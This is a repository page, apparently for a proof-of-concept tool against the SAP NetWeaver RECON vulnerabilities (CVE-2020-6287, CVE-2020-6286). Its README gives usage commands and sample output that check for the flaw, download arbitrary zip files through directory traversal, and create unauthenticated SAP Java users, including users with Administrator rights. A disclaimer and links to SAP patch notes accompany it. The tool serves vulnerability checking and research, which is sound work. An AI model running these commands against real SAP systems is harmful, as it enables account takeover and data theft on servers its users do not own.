Need help with SAP_RECON?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

chipik
149 Stars 50 Forks 13 Commits 1 Opened issues

Description

PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)

Services available

!
?

Need anything else?

Contributors list

PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)

~~Pffff! RECON (Remotely Exploitable Code On NetWeaver)? Guys, really? That was the best codename you came up with? :)~~

This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and as a PoC script exploits directory traversal in

queryProtocol
method.

Directory traversal allows to download any

zip
from SAP server.

This project is created only for educational purposes and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials of this project

Original finding:

CVE-2020-6287: Pablo Artuso
CVE-2020-6286: Yvan 'iggy' G.

Solution: #2934135, #2939665

How to use

Just point SAP NW AS Java hostnmae/ip.

There is additional options:

  1. -c
    - check if SAP server is vulnerable to RECON
  2. -f
    - download
    zip
    file from SAP server
  3. -u
    - create user SAP JAVA user with
    Authenticated User
    role
  4. -a
    - create user SAP JAVA user with
    Administrator
    role

Ex.: Download zip file

~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved

Ex.: Create SAP JAVA user

~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created

Ex.: Create SAP JAVA Administrator user

~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created

All options

~python RECON.py -h
usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
                [-u] [-a] [--timeout TIMEOUT] [-v]

PoC for CVE-2020-6287, (RECON) This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method Original finding:

Thanks:

Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665

optional arguments: -h, --help show this help message and exit -H HOST, --host HOST Java NW host (default: 127.0.0.1) -P PORT, --port PORT Java NW web port (default: tcp/50000) -p PROXY, --proxy PROXY Use proxy (ex: 127.0.0.1:8080) -s, --ssl enable SSL -c, --check just detect vulnerability -f ZIPFILE, --zipfile ZIPFILE ZIP file to read. CVE-2020-6286 -u, --user Create simple JAVA user. CVE-2020-6287 -a, --admin Create JAVA user with role "Administrator". CVE-2020-6287 --timeout TIMEOUT HTTP connection timeout in second (default: 10) -v, --verbose verbose mode

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.